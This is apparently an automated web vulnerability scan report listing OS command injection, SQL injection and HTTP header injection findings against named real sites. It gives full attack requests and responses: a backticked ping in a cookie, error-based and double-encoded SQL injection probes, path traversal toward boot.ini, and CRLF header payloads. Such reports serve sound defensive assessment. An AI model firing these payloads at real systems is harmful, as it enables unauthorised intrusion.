OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug HTTP/1.1
Host: community.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rh_omni_tc=70160000000H4AjAAK; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttp%25253A//community.jboss.org/account/login.jspa%2526oid%253DLogin%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D428; jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; s_ria=flash%2010%7Csilverlight%20not%20detected; s_vnum=1292422844821%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1289831298721; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmc=153813930`ping%20-c%2020%20127.0.0.1`; __utmb=153813930.2.10.1289831027;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 16:55:03 GMT
Server: Apache-Coyote/1.1
X-JAL: 35634
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=33382c323032363b33382c323032353b33382c323037353b33382c323035383b3130322c31303332363b3130322c31353434373b3130322c31353237343b3130322c31343734343b3130322c31303433333b313436343932373436342c353739303b332c37373531373b332c37373531323b332c37373531313b332c37373531333b332c37373531383b332c37373531363b332c37373531343b332c37373531353b332c37373531393b332c31363236363b31342c323132343b31342c323134313b31342c323133373b31342c323036393b31342c323232333b31342c323232323b31342c323133363b31342c323133353b31342c323036383b31342c323133313b; Expires=Wed, 15-Dec-2010 16:55:39 GMT; Path=/
Vary: User-Agent
X-JSL: D=35719887 t=1289840103770601
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 80971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

2. SQL injection  previous  next
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3'&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 341
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string '3''.</font>
...[SNIP]...

Request 2

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3''&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:35:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40900
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=CGLJLAHALAKOMBBOIBLPFPHC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...

2.2. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--'&RegionId=3&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 353
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string '-- Keyword --''.</font>
...[SNIP]...

Request 2

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--''&RegionId=3&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 41352
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...

2.3. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&KeyWord=--+Keyword+--&RegionId=3%2527&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.4. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3%2527&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40ex
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.5. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 449

AdTagCountyId=..%2f..%2f..%2f..%2f..%2f..%2fCANTBEHERE%2f..%2f..%2f..%2f..%2fboot.ini&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWo
...[SNIP]...
&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3%2527&UserEmail=netsparker%40example.com&UserPwd=3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:40:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

2.6. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=&SubCatId=100%2527&RegionId=&KeyWord=--+Keyword+-- HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 15 Nov 2010 07:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 318
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Line 1: Incorrect syntax near '%'.</font>
...[SNIP]...

3. HTTP header injection  previous  next
There are 14 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://27.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload df8cc%0d%0afc9c0f60969 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22&df8cc%0d%0afc9c0f60969=1 HTTP/1.1
Host: 27.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:31:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=260e714d-3349-3fa8-629a-00004b889a33; expires=Sun, 13-Feb-2011 09:31:38 GMT; path=/; domain=.xg4ken.com
Location: https://ddb.kineticd.com/ads/ppc.aspx/x22?df8cc
fc9c0f60969
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3.2. http://27.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload f07da%0d%0a7c3685c0c33 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22f07da%0d%0a7c3685c0c33 HTTP/1.1
Host: 27.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:31:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2ed9d8ec-0b69-c609-d39a-000059980589; expires=Sun, 13-Feb-2011 09:31:39 GMT; path=/; domain=.xg4ken.com
Location: https://ddb.kineticd.com/ads/ppc.aspx/x22f07da
7c3685c0c33

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3.3. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91a3b%0d%0a8a3d72eaf29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91a3b%0d%0a8a3d72eaf29/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91a3b
8a3d72eaf29
/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:20:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d98a%0d%0a59d7a244a36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d98a%0d%0a59d7a244a36/N4300.NYTimes/B5008440.7 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
